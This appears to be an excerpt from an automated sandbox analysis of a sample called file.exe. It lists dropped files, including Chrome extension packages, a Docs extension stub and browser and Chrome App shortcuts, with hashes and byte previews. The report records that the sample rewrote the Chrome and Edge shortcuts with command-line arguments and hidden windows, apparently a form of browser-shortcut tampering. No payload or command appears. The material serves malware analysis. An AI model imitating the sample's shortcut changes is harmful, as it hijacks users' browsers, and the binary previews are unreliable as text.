                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):291
                                                                                                                                          Entropy (8bit):4.644891151983713
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK6M23:2Q8KVqb2u/Rt3OnjI
                                                                                                                                          MD5:EE9839F99DED6F38DC561DB846B51E80
                                                                                                                                          SHA1:DD2128A473C2FF47471400C81EFF416285DE606E
                                                                                                                                          SHA-256:06E08E421EB7F0FE7959D68E27D40A9146A54503090D95CFAC6F2FFD72A78769
                                                                                                                                          SHA-512:C8D77607F00CB8012CD056CE61CB77918EC43621270511303E09577F89CC57D4954E22E2C8C3FB1029AAE29F8142DAAE2E938CD5590AD0E5DE6DB1208AFEF874
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=2;}).call(this);.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\d32f2f51-7702-4f9c-b344-70b157dfbb57.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):98960
                                                                                                                                          Entropy (8bit):7.702941019514499
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:EMgLUGcY3s6U4W3NrUeNWy4cSbJUQyuW+8hXuzoLdN4pu1FIc1/x/iDhoA9lo:bEUGEKer/W0KJIudO6Mn4pu1dpKtoX
                                                                                                                                          MD5:FC21C3084ECE86A867515F4112126D22
                                                                                                                                          SHA1:7AD412386EEDA21136AB332EDCED98AF075CCCD2
                                                                                                                                          SHA-256:378723490592C0627AC18A287F9A9CB74970C3C6E10A177C322282BFC1D01E01
                                                                                                                                          SHA-512:37777D2F86D5586B5DB02FE8DF853814FF0B1FCF0141ADB8CF0A42CE3C15C5DA8F65DE89E2DEB8C13040302F95C6B0FF523A4288C5D38FF7977212AA011B1309
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Cr24....d"........0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........S.S.H.{..a./-X.....Q.B'E..^...+....3..../`L).&w.e...`...v.V.v.....$.RB..IH.7wJ..a..r....t..b.'.V.5.{.O....5.x........q..........R.I.P.o\.FCx......l.%..5.1......O)d/O H?..S..1.o.gK3.*.6Ug.5<..k.....\........Z............yK.W.?....C..gh...R/.W.....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!.....T...B.l........~_&.K..HH...!.....6]..~.g....n{.f...Q2..Ip..?s".>...........|[s...._.Z......o! 01".]@]]...`...$.t.....vWw.t...d.....CB....M6...0.....6.5M[.......y?.....t....g}..f......m*/.XJ}|s.....m#7.6[U_v[n.......^.j+...y.6:.."P.....}|.w..].>....C..?v......vK.}|.=^....GB.X..x=_.....p.q...#.g:...P....

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 12:40:12 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2436
                                                                                                                                          Entropy (8bit):3.5853371292286824
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8STdfTXdanRYrnvDdAKRkdA0qOJq87dAKR+/KRllynP:8SJ4SINly
                                                                                                                                          MD5:A9A49502C44818B0D2E80BFE6503F9E3
                                                                                                                                          SHA1:A583EB1FA5D573846D34F5BF25262F3C8E2365D4
                                                                                                                                          SHA-256:5267B76C5C7745921E413851FC9D597194B88CECF657DF4871B873D49287EC06
                                                                                                                                          SHA-512:D24E711F011CA5A052CE79379F48B8484D3D518003631789AD5883906D424B13FC59B74B203D3C20E4752F849A65E4DAA8E386361A52B552F83F2B04756E1EB0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ......,....}..L.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.H..PROGRA~1..t......O.IDW&l....B...............J.......8.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW)l..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.G.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.@. .-

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Wed Oct 4 12:34:48 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2506
                                                                                                                                          Entropy (8bit):3.682697400104861
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8dQG2dOyW+YusJ2JrnzTdRdkqOJq5dLXuHj0PkZy+7:8bVSl7uD0PkZy
                                                                                                                                          MD5:3FDE95F4E80B8E52A1E89534B5D18455
                                                                                                                                          SHA1:631A964A86619B52C8CF229E24B9703508690097
                                                                                                                                          SHA-256:F149E3DF33F1667C279DC227BC90BADE76E3C39450812752A88BD9DCCBDB51CE
                                                                                                                                          SHA-512:7A14ED0C0BA3ABBD4DB09F711EEBA73311422AEB6C1447C88B0CC2E9F3857606531A5C8AB096B463976B7E263630C1F6D77F0D173FB588C5D168B64EBFD2C16D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. .....|.K...e[P......?......(>@.....................1....P.O. .:i.....+00.../C:\.....................1.....DW-F..PROGRA~2.........O.IDW&l....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....CW.`..MICROS~1..D......(Ux.DWUl..........................6|..M.i.c.r.o.s.o.f.t.....N.1.....CWaa0.Edge..:.......S8.DWUl...........................s..E.d.g.e.....`.1.....CWaa0.APPLIC~1..H.......S8.DWUl..............................A.p.p.l.i.c.a.t.i.o.n.....`.2.(>@.=W2b .msedge.exe..F.......S8.DWUl....u.......................q.m.s.e.d.g.e...e.x.e.......k...............-.......j............F.......C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.N.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2477
                                                                                                                                          Entropy (8bit):3.613168324457863
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8S7dBT6DpRYrnvs4dAKRkdA0qOJq87dAKR+/KRlay8Ec:8SnhCNayd
                                                                                                                                          MD5:D742725F7E1CE64FF16D7603C535F4F2
                                                                                                                                          SHA1:40D850D20D82C5646AB7C963BE80E1D7AD236C83
                                                                                                                                          SHA-256:A1823210FC162B973878B406DE24F1AB91AC49FC23AF5B7DF9D01EA7D2E4601E
                                                                                                                                          SHA-512:395F5BAAB6D6A5CF4C54886E19C3935C1A4D04673490A2AA7AA326E0E56C52830ED05E333BDDDDAEACB22E71AF9D263F35072CAD35D1574C031350B7232E0CD1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ......,.....=.,.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW.V..PROGRA~1..t......O.ICW.V....B...............J.....p+j.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M.....................G-..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.V..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.M.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 12 06:14:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2677
                                                                                                                                          Entropy (8bit):3.9768018908443183
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8P5dYTcUm5HXidAKZdA19ehwiZUklqehOy+3:8Ps/mrVy
                                                                                                                                          MD5:9C828A4F5799644D8E3C14F8914CA163
                                                                                                                                          SHA1:1DDF1D17EC025D7C9B0D00C71397246F43E12BDB
                                                                                                                                          SHA-256:793A5C992106DA7A2148A231FBD5A42294893768E7EC832854FCC8F3C145350E
                                                                                                                                          SHA-512:E67736771A5E61B6A885B68E34E36A85440C4098ADE21FCE08870DA204FC6E585D88534EF44C980EC4C90DD3E6E4580E4918889105E57C6525B980ED31A737D4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,.....s......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 12 06:14:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2679
                                                                                                                                          Entropy (8bit):3.9934003673258496
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8XdYTcUm5HXidAKZdA1weh/iZUkAQkqehFy+2:8W/mZ9QMy
                                                                                                                                          MD5:5D6990BF59BF57B853CBC7EAF21024C4
                                                                                                                                          SHA1:6C060CB5FBAFCB275960E63048195A89BDF1BD11
                                                                                                                                          SHA-256:F77624170C8CC568B55F68F3F0EA17408D6B4F5BCCF94506DB27CE2E4112636C
                                                                                                                                          SHA-512:AEA6D9D829808DB65612D564871126EAD434154DF595F84226B0B5C17A0FD9B0AE401341DC8EEBA43A95EEC26AFCB2A911EC03011CC64995B931FBCBA2A7C4C9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,....Q.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2693
                                                                                                                                          Entropy (8bit):4.004676669259593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8x1dYTcUsHXidAKZdA14tseh7sFiZUkmgqeh7sTy+BX:8xg/6nRy
                                                                                                                                          MD5:3C80C5F663F3F7B8235E6DD502E50999
                                                                                                                                          SHA1:7C4BCB89537654C0D5A074D214916218F4E7AE48
                                                                                                                                          SHA-256:057AC210F8E6661B3CE34F0AEC5BE5D37680182F126952F43E3174E4593E4BF6
                                                                                                                                          SHA-512:3BBD217408DBCC3BD9F2EABA5B9A1400A405E80857AA4A89904A2060C3C5A0F02AEF4FEF71F721279B9F3DA0145151D28FE6850194FB0932BEC080A1FFE3E619
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 12 06:14:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2681
                                                                                                                                          Entropy (8bit):3.9925427637880517
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8VdYTcUm5HXidAKZdA1vehDiZUkwqeh5y+R:8A/m6by
                                                                                                                                          MD5:8D5642DA5AF8C2931CC1D8459C02A2B2
                                                                                                                                          SHA1:A7B463864B956F58DA2D603DA429A8470480E175
                                                                                                                                          SHA-256:8D5EF0764A82E0CAD95426C7086CEB91337A2A26D16A9F4A6955E9258299BC62
                                                                                                                                          SHA-512:FC5391E4D13769218226764FB4C9C79563E0EAF8387644C2DBB28B26AF18567CB428B402042D56E07E1AA207ADC47BD577BF65C0E8D184A5539443F34E503ED6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,....+.8.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 12 06:14:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2681
                                                                                                                                          Entropy (8bit):3.980824115027038
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8FdYTcUm5HXidAKZdA1hehBiZUk1W1qeh/y+C:8Q/m69fy
                                                                                                                                          MD5:911A3F693A1CB64C9B3A7826EA64E0CD
                                                                                                                                          SHA1:01A3DC7A533D8E80EA648C4CBF62F8631E4E5747
                                                                                                                                          SHA-256:1DC389B0DCB1177A1467C9658BC0056142F0397F1220326F1112C4E6522FA0A1
                                                                                                                                          SHA-512:0F635CCBE0B6A600810A22B709AD4D1789464364A3625CA0685A32D0A0758A1B88AE4C4323BE8289134197BE870F3BD57546897E69780E34740C63E8E5724DBD
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,.....,......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 12 06:14:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2683
                                                                                                                                          Entropy (8bit):3.9937382410191673
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8RdYTcUm5HXidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbRy+yT+:8k/mET/TbxWOvTbRy7T
                                                                                                                                          MD5:16131630EB673763D7A29464C838D680
                                                                                                                                          SHA1:9F7A04A583C39E6DBCB921AB71CED49A10A4DE84
                                                                                                                                          SHA-256:E4E95BC9DBD2D4D73B0ADCC9F934CE42A64BC60603C885947B4549D398EB3750
                                                                                                                                          SHA-512:10C7CD57732B0A2F64DEF4555895B240C7BE0806D5B2BEB358E84FC133A57D1BF3880F123374ABBAFB93572FC9768FE18873119893DCFF17579BD7FA1C082525
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,......,.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\Downloads\e511dfb7-6260-46f5-99d1-f7cefa8e3903.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):12071
                                                                                                                                          Entropy (8bit):7.96872755321021
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:cyr4ZznSBJDPhkr8iwo8ZNNf1RE1+hfM4Hr7Nk9RZzWu22JBJ4/Krc59uESv07+/:5USrDPhkwiUZTf1/hfM4HnNgDzW18BPF
                                                                                                                                          MD5:2A56357C453F2AA3E88B83B9DEFDB505
                                                                                                                                          SHA1:518A83E592497957DC8BB91179A6753262EA265F
                                                                                                                                          SHA-256:2A04E21EC91D5FC2B57C849BBE7985EEBECC407287CCA85551E2D4ED4B0DC93D
                                                                                                                                          SHA-512:58FDE291D0B777AD2719F9F76E3D5C7499FEA91C2B35D574B0FB4A7DA7D6DD193D52652A6DF64A1C4ADA253543A56F47F80DE30757D64B631AC37B421DE1A327
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Cr24....E.........0.."0...*.H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..*7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<............i.r.{....^tP1.../..|....O.K5......D*A.q.w.u.7....;|".:.6.p..R>2...#...+...mn,..&.....(....le;{.V.......~...M.rC.)....&.W.bJ.. (&...9..A.N..F4wKyd*U..'d,.@.{..+.mF17.^......<...i.M....L..;s..].F.*=.F....K..]d.wD..S..rQ..).>.iO)@.oyi....n.'a..+....x.u..C. ....B....... .>....G.(..n~..CP.D........>...-.....A8]i.].b.2?.p.....+..w....$fT.B.D.*.l.....k../P.?..w.....-Cn...`z.[nO.J..y.....Z..)@..}c...v*a.wde>)..

                                                                                                                                          Chrome Cache Entry: 243

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (805)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):810
                                                                                                                                          Entropy (8bit):5.136427984001762
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:P767IBHslgT9lCuABuoB7HHHHHHHYqmffffffo:+kKlgZ01BuSEqmffffffo
